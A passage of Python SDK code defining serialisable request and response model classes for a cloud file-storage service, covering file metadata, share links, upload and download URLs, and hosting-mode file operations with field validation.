            self.thumbnail = m.get('thumbnail')
        if m.get('trashed_at') is not None:
            self.trashed_at = m.get('trashed_at')
        if m.get('type') is not None:
            self.type = m.get('type')
        if m.get('updated_at') is not None:
            self.updated_at = m.get('updated_at')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        if m.get('url') is not None:
            self.url = m.get('url')
        if m.get('user_meta') is not None:
            self.user_meta = m.get('user_meta')
        if m.get('video_media_metadata') is not None:
            temp_model = VideoMediaResponse()
            self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
        if m.get('video_preview_metadata') is not None:
            temp_model = VideoPreviewResponse()
            self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
        return self
class GetLastCursorResponse(TeaModel):
    """Response carrying the last file-operation cursor."""

    def __init__(
        self,
        cursor: str = None,
    ):
        # last file op cursor
        self.cursor = cursor

    def validate(self):
        # response model: nothing to validate
        pass

    def to_map(self):
        mapping = {}
        if self.cursor is not None:
            mapping['cursor'] = self.cursor
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        cursor = source.get('cursor')
        if cursor is not None:
            self.cursor = cursor
        return self
class GetLinkInfoByUserIDRequest(TeaModel):
    """Request to look up account link info by user ID."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        user_id: str = None,
    ):
        # extra request headers
        self.headers = headers
        # user ID
        self.user_id = user_id

    def validate(self):
        # user_id is mandatory; headers are optional
        self.validate_required(self.user_id, 'user_id')

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.user_id is not None:
            mapping['user_id'] = self.user_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('headers', 'user_id'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetMediaPlayURLResponse(TeaModel):
    """get_media_play_url response."""

    def __init__(
        self,
        url: str = None,
    ):
        # media play url
        self.url = url

    def validate(self):
        # response model: nothing to validate
        pass

    def to_map(self):
        mapping = {}
        if self.url is not None:
            mapping['url'] = self.url
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        url = source.get('url')
        if url is not None:
            self.url = url
        return self
class GetOfficeEditUrlResponse(TeaModel):
    """Response with the online-edit URL of an office document."""

    def __init__(
        self,
        edit_url: str = None,
        office_access_token: str = None,
        office_refresh_token: str = None,
    ):
        # online edit url
        self.edit_url = edit_url
        # office access token
        self.office_access_token = office_access_token
        # office refresh token
        self.office_refresh_token = office_refresh_token

    def validate(self):
        # response model: nothing to validate
        pass

    def to_map(self):
        # every map key matches its attribute name
        entries = {
            'edit_url': self.edit_url,
            'office_access_token': self.office_access_token,
            'office_refresh_token': self.office_refresh_token,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('edit_url', 'office_access_token', 'office_refresh_token'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetOfficePreviewUrlResponse(TeaModel):
    """Response with the preview URL of a document."""

    def __init__(
        self,
        access_token: str = None,
        preview_url: str = None,
    ):
        # access token
        self.access_token = access_token
        # preview url
        self.preview_url = preview_url

    def validate(self):
        # response model: nothing to validate
        pass

    def to_map(self):
        # every map key matches its attribute name
        entries = {
            'access_token': self.access_token,
            'preview_url': self.preview_url,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('access_token', 'preview_url'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetPublicKeyRequest(TeaModel):
    """Request to fetch a public key; all fields are optional."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
    ):
        # extra request headers
        self.headers = headers
        # App ID
        self.app_id = app_id

    def validate(self):
        # unlike GetAppPublicKeyRequest, app_id is not required here
        pass

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.app_id is not None:
            mapping['app_id'] = self.app_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('headers', 'app_id'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetRPVerifyResultRequest(TeaModel):
    """Request for a real-person verification result."""

    def __init__(
        self,
        user_id: str = None,
    ):
        # ID of the current user
        self.user_id = user_id

    def validate(self):
        # user_id is the only field and it is mandatory
        self.validate_required(self.user_id, 'user_id')

    def to_map(self):
        mapping = {}
        if self.user_id is not None:
            mapping['user_id'] = self.user_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        user_id = source.get('user_id')
        if user_id is not None:
            self.user_id = user_id
        return self
class GetRPVerifyTokenRequest(TeaModel):
    """Request for fetching an RP verification token."""

    def __init__(
        self,
        user_id: str = None,
    ):
        # ID of the user currently accessing (required)
        self.user_id = user_id

    def validate(self):
        # user_id is mandatory for this request
        self.validate_required(self.user_id, 'user_id')

    def to_map(self):
        result = dict()
        if self.user_id is not None:
            result['user_id'] = self.user_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        value = m.get('user_id')
        if value is not None:
            self.user_id = value
        return self
class GetShareLinkByAnonymousResponse(TeaModel):
    """get_share_link_by_anonymous response: public metadata of a share link."""

    # serialized field names in wire order; attribute name equals the map key
    _FIELDS = (
        'avatar',
        'creator_id',
        'creator_name',
        'creator_phone',
        'expiration',
        'share_name',
        'updated_at',
    )

    def __init__(
        self,
        avatar: str = None,
        creator_id: str = None,
        creator_name: str = None,
        creator_phone: str = None,
        expiration: str = None,
        share_name: str = None,
        updated_at: str = None,
    ):
        self.avatar = avatar
        self.creator_id = creator_id
        self.creator_name = creator_name
        self.creator_phone = creator_phone
        self.expiration = expiration
        self.share_name = share_name
        self.updated_at = updated_at

    def validate(self):
        pass

    def to_map(self):
        # emit only the fields that are populated
        return {
            name: getattr(self, name)
            for name in self._FIELDS
            if getattr(self, name) is not None
        }

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareLinkIDResponse(TeaModel):
    """get_share_id response."""

    _FIELDS = ('share_id', 'share_pwd')

    def __init__(
        self,
        share_id: str = None,
        share_pwd: str = None,
    ):
        # share_id
        self.share_id = share_id
        # share_pwd
        self.share_pwd = share_pwd

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareLinkTokenResponse(TeaModel):
    """get_share_token response."""

    _FIELDS = ('expire_time', 'expires_in', 'share_token')

    def __init__(
        self,
        expire_time: str = None,
        expires_in: int = None,
        share_token: str = None,
    ):
        # expire_time
        self.expire_time = expire_time
        # expires_in
        self.expires_in = expires_in
        # share_token
        self.share_token = share_token

    def validate(self):
        # all three fields are mandatory in a valid response
        for name in self._FIELDS:
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareResponse(TeaModel):
    """Get share response."""

    # scalar fields serialized before / after the nested 'share_policy' list
    _PRE_POLICY = (
        'created_at', 'creator', 'description', 'domain_id', 'drive_id',
        'expiration', 'expired', 'owner', 'permissions', 'share_file_id',
        'share_file_path', 'share_id', 'share_name',
    )
    _POST_POLICY = ('status', 'updated_at')

    def __init__(
        self,
        created_at: str = None,
        creator: str = None,
        description: str = None,
        domain_id: str = None,
        drive_id: str = None,
        expiration: str = None,
        expired: bool = None,
        owner: str = None,
        permissions: List[str] = None,
        share_file_id: str = None,
        share_file_path: str = None,
        share_id: str = None,
        share_name: str = None,
        share_policy: List[SharePermissionPolicy] = None,
        status: str = None,
        updated_at: str = None,
    ):
        self.created_at = created_at
        self.creator = creator
        self.description = description
        self.domain_id = domain_id
        self.drive_id = drive_id
        self.expiration = expiration
        self.expired = expired
        self.owner = owner
        self.permissions = permissions
        self.share_file_id = share_file_id
        self.share_file_path = share_file_path
        self.share_id = share_id
        self.share_name = share_name
        # list of nested SharePermissionPolicy models
        self.share_policy = share_policy
        self.status = status
        self.updated_at = updated_at

    def validate(self):
        # cascade validation into each nested policy entry
        for policy in self.share_policy or ():
            if policy:
                policy.validate()

    def to_map(self):
        result = dict()
        for name in self._PRE_POLICY:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        # 'share_policy' is always present in the map, defaulting to []
        result['share_policy'] = []
        if self.share_policy is not None:
            result['share_policy'] = [
                policy.to_map() if policy else None for policy in self.share_policy
            ]
        for name in self._POST_POLICY:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._PRE_POLICY:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        # the policy list is always reset before being repopulated
        self.share_policy = []
        raw_policies = m.get('share_policy')
        if raw_policies is not None:
            for item in raw_policies:
                self.share_policy.append(SharePermissionPolicy().from_map(item))
        for name in self._POST_POLICY:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetUploadUrlResponse(TeaModel):
    """Get UploadUrl Response."""

    _SCALARS = ('create_at', 'domain_id', 'drive_id', 'file_id')

    def __init__(
        self,
        create_at: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_id: str = None,
        part_info_list: List[UploadPartInfo] = None,
        upload_id: str = None,
    ):
        # creation time (note: the wire key is 'create_at', not 'created_at')
        self.create_at = create_at
        self.domain_id = domain_id
        self.drive_id = drive_id
        self.file_id = file_id
        # nested UploadPartInfo entries for the multipart upload
        self.part_info_list = part_info_list
        self.upload_id = upload_id

    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        # cascade into each nested part entry
        for part in self.part_info_list or ():
            if part:
                part.validate()

    def to_map(self):
        result = dict()
        for name in self._SCALARS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        # 'part_info_list' is always present in the map, defaulting to []
        result['part_info_list'] = []
        if self.part_info_list is not None:
            result['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._SCALARS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        # the part list is always reset before being repopulated
        self.part_info_list = []
        raw_parts = m.get('part_info_list')
        if raw_parts is not None:
            for item in raw_parts:
                self.part_info_list.append(UploadPartInfo().from_map(item))
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        return self
class GetVideoPreviewSpriteURLResponse(TeaModel):
    """Response for fetching video preview sprite-sheet URLs."""

    # serialized field names in wire order; attribute name equals the map key
    _FIELDS = (
        'col',
        'count',
        'frame_count',
        'frame_height',
        'frame_width',
        'row',
        'sprite_url_list',
    )

    def __init__(
        self,
        col: int = None,
        count: int = None,
        frame_count: int = None,
        frame_height: int = None,
        frame_width: int = None,
        row: int = None,
        sprite_url_list: List[str] = None,
    ):
        self.col = col
        self.count = count
        self.frame_count = frame_count
        self.frame_height = frame_height
        self.frame_width = frame_width
        self.row = row
        # list of sprite image URLs
        self.sprite_url_list = sprite_url_list

    def validate(self):
        pass

    def to_map(self):
        # emit only the fields that are populated
        return {
            name: getattr(self, name)
            for name in self._FIELDS
            if getattr(self, name) is not None
        }

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetVideoPreviewURLResponse(TeaModel):
    """Response for fetching a video playback URL."""

    def __init__(
        self,
        preview_url: str = None,
    ):
        # URL at which the video can be played
        self.preview_url = preview_url

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        if self.preview_url is not None:
            result['preview_url'] = self.preview_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        value = m.get('preview_url')
        if value is not None:
            self.preview_url = value
        return self
class HostingCompleteFileResponse(TeaModel):
    """complete file response (hosting mode)."""

    # (attribute, wire key) pairs in serialization order.
    # Note the one mismatch: attribute crc_64hash <-> key 'crc64_hash'.
    _FIELDS = (
        ('content_hash', 'content_hash'),
        ('content_hash_name', 'content_hash_name'),
        ('content_type', 'content_type'),
        ('crc', 'crc'),
        ('crc_64hash', 'crc64_hash'),
        ('created_at', 'created_at'),
        ('description', 'description'),
        ('domain_id', 'domain_id'),
        ('download_url', 'download_url'),
        ('drive_id', 'drive_id'),
        ('file_extension', 'file_extension'),
        ('file_path', 'file_path'),
        ('name', 'name'),
        ('parent_file_path', 'parent_file_path'),
        ('share_id', 'share_id'),
        ('size', 'size'),
        ('status', 'status'),
        ('thumbnail', 'thumbnail'),
        ('trashed_at', 'trashed_at'),
        ('type', 'type'),
        ('updated_at', 'updated_at'),
        ('upload_id', 'upload_id'),
        ('url', 'url'),
    )

    def __init__(
        self,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        file_extension: str = None,
        file_path: str = None,
        name: str = None,
        parent_file_path: str = None,
        share_id: str = None,
        size: int = None,
        status: str = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
    ):
        self.content_hash = content_hash
        self.content_hash_name = content_hash_name
        self.content_type = content_type
        self.crc = crc
        # serialized as 'crc64_hash'
        self.crc_64hash = crc_64hash
        self.created_at = created_at
        self.description = description
        self.domain_id = domain_id
        self.download_url = download_url
        self.drive_id = drive_id
        self.file_extension = file_extension
        self.file_path = file_path
        # file name (required; see validate)
        self.name = name
        # path of the parent file/folder
        self.parent_file_path = parent_file_path
        self.share_id = share_id
        self.size = size
        self.status = status
        self.thumbnail = thumbnail
        self.trashed_at = trashed_at
        self.type = type
        self.updated_at = updated_at
        self.upload_id = upload_id
        self.url = url

    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        # name is mandatory and restricted to a conservative character set
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_path is not None:
            self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
            self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
        if self.size is not None:
            # size is bounded to [0, 50 GiB]
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)

    def to_map(self):
        # emit only the fields that are populated
        return {
            key: getattr(self, attr)
            for attr, key in self._FIELDS
            if getattr(self, attr) is not None
        }

    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in self._FIELDS:
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class HostingCopyFileResponse(TeaModel):
    """File copy response (hosting mode)."""

    _FIELDS = ('async_task_id', 'domain_id', 'drive_id', 'file_path', 'share_id')

    def __init__(
        self,
        async_task_id: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_path: str = None,
        share_id: str = None,
    ):
        # ID of the asynchronous copy task
        self.async_task_id = async_task_id
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        # share_id
        self.share_id = share_id

    def validate(self):
        # note: the domain_id pattern here also allows a hyphen
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z-]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[a-z0-9A-Z]+')

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingCreateFileResponse(TeaModel):
    """Create file response (hosting mode)."""

    _PRE_PARTS = ('domain_id', 'drive_id', 'file_path')
    _POST_PARTS = ('share_id', 'type', 'upload_id')

    def __init__(
        self,
        domain_id: str = None,
        drive_id: str = None,
        file_path: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        type: str = None,
        upload_id: str = None,
    ):
        self.domain_id = domain_id
        self.drive_id = drive_id
        self.file_path = file_path
        # nested UploadPartInfo entries for the multipart upload
        self.part_info_list = part_info_list
        self.share_id = share_id
        self.type = type
        self.upload_id = upload_id

    def validate(self):
        if self.domain_id is not None:
            self.validate_max_length(self.domain_id, 'domain_id', 50)
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9]{1,50}')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        # cascade into each nested part entry
        for part in self.part_info_list or ():
            if part:
                part.validate()
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9]+')

    def to_map(self):
        result = dict()
        for name in self._PRE_PARTS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        # 'part_info_list' is always present in the map, defaulting to []
        result['part_info_list'] = []
        if self.part_info_list is not None:
            result['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        for name in self._POST_PARTS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._PRE_PARTS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        # the part list is always reset before being repopulated
        self.part_info_list = []
        raw_parts = m.get('part_info_list')
        if raw_parts is not None:
            for item in raw_parts:
                self.part_info_list.append(UploadPartInfo().from_map(item))
        for name in self._POST_PARTS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingDeleteFileResponse(TeaModel):
    """Delete file response (hosting mode)."""

    _FIELDS = ('async_task_id', 'domain_id', 'drive_id', 'file_path', 'share_id')

    def __init__(
        self,
        async_task_id: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_path: str = None,
        share_id: str = None,
    ):
        # ID of the asynchronous delete task
        self.async_task_id = async_task_id
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        # share_id
        self.share_id = share_id

    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[a-z0-9A-Z]+')

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingDeleteFilesResponse(TeaModel):
    """Batch delete files response (hosting mode)."""

    _FIELDS = ('deleted_file_id_list', 'domain_id', 'drive_id', 'share_id')

    def __init__(
        self,
        deleted_file_id_list: List[str] = None,
        domain_id: str = None,
        drive_id: str = None,
        share_id: str = None,
    ):
        # IDs of the files that were deleted
        self.deleted_file_id_list = deleted_file_id_list
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # share_id
        self.share_id = share_id

    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9]+')

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingGetDownloadUrlResponse(TeaModel):
    """Get download url response (hosting mode)."""

    _FIELDS = ('expiration', 'method', 'url')

    def __init__(
        self,
        expiration: str = None,
        method: str = None,
        url: str = None,
    ):
        # expiration time of the download URL
        self.expiration = expiration
        # HTTP method to use with the URL
        self.method = method
        # the download URL itself
        self.url = url

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingGetFileResponse(TeaModel):
    """Get file metadata response (hosting mode)."""

    # (attribute, wire key) pairs in serialization order.
    # Note the one mismatch: attribute crc_64hash <-> key 'crc64_hash'.
    _FIELDS = (
        ('content_hash', 'content_hash'),
        ('content_hash_name', 'content_hash_name'),
        ('content_type', 'content_type'),
        ('crc_64hash', 'crc64_hash'),
        ('created_at', 'created_at'),
        ('description', 'description'),
        ('domain_id', 'domain_id'),
        ('download_url', 'download_url'),
        ('drive_id', 'drive_id'),
        ('file_extension', 'file_extension'),
        ('file_path', 'file_path'),
        ('name', 'name'),
        ('parent_file_path', 'parent_file_path'),
        ('share_id', 'share_id'),
        ('size', 'size'),
        ('status', 'status'),
        ('thumbnail', 'thumbnail'),
        ('trashed_at', 'trashed_at'),
        ('type', 'type'),
        ('updated_at', 'updated_at'),
        ('upload_id', 'upload_id'),
        ('url', 'url'),
    )

    def __init__(
        self,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        file_extension: str = None,
        file_path: str = None,
        name: str = None,
        parent_file_path: str = None,
        share_id: str = None,
        size: int = None,
        status: str = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
    ):
        self.content_hash = content_hash
        self.content_hash_name = content_hash_name
        self.content_type = content_type
        # serialized as 'crc64_hash'
        self.crc_64hash = crc_64hash
        self.created_at = created_at
        self.description = description
        self.domain_id = domain_id
        self.download_url = download_url
        self.drive_id = drive_id
        self.file_extension = file_extension
        self.file_path = file_path
        # file name (required; see validate)
        self.name = name
        # path of the parent file/folder
        self.parent_file_path = parent_file_path
        self.share_id = share_id
        self.size = size
        self.status = status
        self.thumbnail = thumbnail
        self.trashed_at = trashed_at
        self.type = type
        self.updated_at = updated_at
        self.upload_id = upload_id
        self.url = url

    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        # name is mandatory and restricted to a conservative character set
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_path is not None:
            self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
            self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
        if self.size is not None:
            # size is bounded to [0, 50 GiB]
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)

    def to_map(self):
        # emit only the fields that are populated
        return {
            key: getattr(self, attr)
            for attr, key in self._FIELDS
            if getattr(self, attr) is not None
        }

    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in self._FIELDS:
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class HostingGetSecureUrlResponse(TeaModel):
    """Get secure url response (hosting mode)."""

    _FIELDS = ('expiration', 'url')

    def __init__(
        self,
        expiration: str = None,
        url: str = None,
    ):
        # expiration time of the secure URL
        self.expiration = expiration
        # the secure URL itself
        self.url = url

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._FIELDS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingGetUploadUrlResponse(TeaModel):
    """Get UploadUrl Response (hosting mode)."""

    _SCALARS = ('create_at', 'domain_id', 'drive_id', 'file_path')

    def __init__(
        self,
        create_at: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_path: str = None,
        part_info_list: List[UploadPartInfo] = None,
        upload_id: str = None,
    ):
        # creation time (note: the wire key is 'create_at', not 'created_at')
        self.create_at = create_at
        self.domain_id = domain_id
        self.drive_id = drive_id
        self.file_path = file_path
        # nested UploadPartInfo entries for the multipart upload
        self.part_info_list = part_info_list
        self.upload_id = upload_id

    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        # cascade into each nested part entry
        for part in self.part_info_list or ():
            if part:
                part.validate()

    def to_map(self):
        result = dict()
        for name in self._SCALARS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        # 'part_info_list' is always present in the map, defaulting to []
        result['part_info_list'] = []
        if self.part_info_list is not None:
            result['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for name in self._SCALARS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        # the part list is always reset before being repopulated
        self.part_info_list = []
        raw_parts = m.get('part_info_list')
        if raw_parts is not None:
            for item in raw_parts:
                self.part_info_list.append(UploadPartInfo().from_map(item))
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        return self
class HostingListFileResponse(TeaModel):
    """
    List file response: one page of hosting files plus a pagination marker.
    """
    def __init__(
        self,
        items: List[BaseHostingFileResponse] = None,
        next_marker: str = None,
    ):
        # files on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseHostingFileResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class HostingListUploadedPartResponse(TeaModel):
    """
    List uploaded parts response (hosting mode).
    """
    def __init__(
        self,
        file_path: str = None,
        next_part_number_marker: str = None,
        upload_id: str = None,
        uploaded_parts: List[UploadPartInfo] = None,
    ):
        # file_path
        self.file_path = file_path
        # marker of the next part number, for pagination
        self.next_part_number_marker = next_part_number_marker
        # upload_id
        self.upload_id = upload_id
        # parts uploaded so far
        self.uploaded_parts = uploaded_parts
    def validate(self):
        # validate each contained part descriptor
        for part in (self.uploaded_parts or []):
            if part:
                part.validate()
    def to_map(self):
        result = dict()
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.next_part_number_marker is not None:
            result['next_part_number_marker'] = self.next_part_number_marker
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        # 'uploaded_parts' is always emitted, even when empty
        result['uploaded_parts'] = []
        if self.uploaded_parts is not None:
            result['uploaded_parts'] = [part.to_map() if part else None for part in self.uploaded_parts]
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('next_part_number_marker') is not None:
            self.next_part_number_marker = m.get('next_part_number_marker')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        # always reset the list; rebuild it from the map when present
        self.uploaded_parts = []
        if m.get('uploaded_parts') is not None:
            self.uploaded_parts = [UploadPartInfo().from_map(part) for part in m.get('uploaded_parts')]
        return self
class HostingMoveFileResponse(TeaModel):
    """
    Move file response.

    Identifies the moved hosting-mode file; `validate()` enforces regex
    patterns on domain_id, drive_id and share_id.
    """
    def __init__(
        self,
        async_task_id: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_path: str = None,
        share_id: str = None,
    ):
        # async_task_id
        self.async_task_id = async_task_id
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        # share_id (original comment wrongly labelled this drive_id)
        self.share_id = share_id
    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z-]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[a-z0-9A-Z]+')
    def to_map(self):
        result = dict()
        if self.async_task_id is not None:
            result['async_task_id'] = self.async_task_id
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.drive_id is not None:
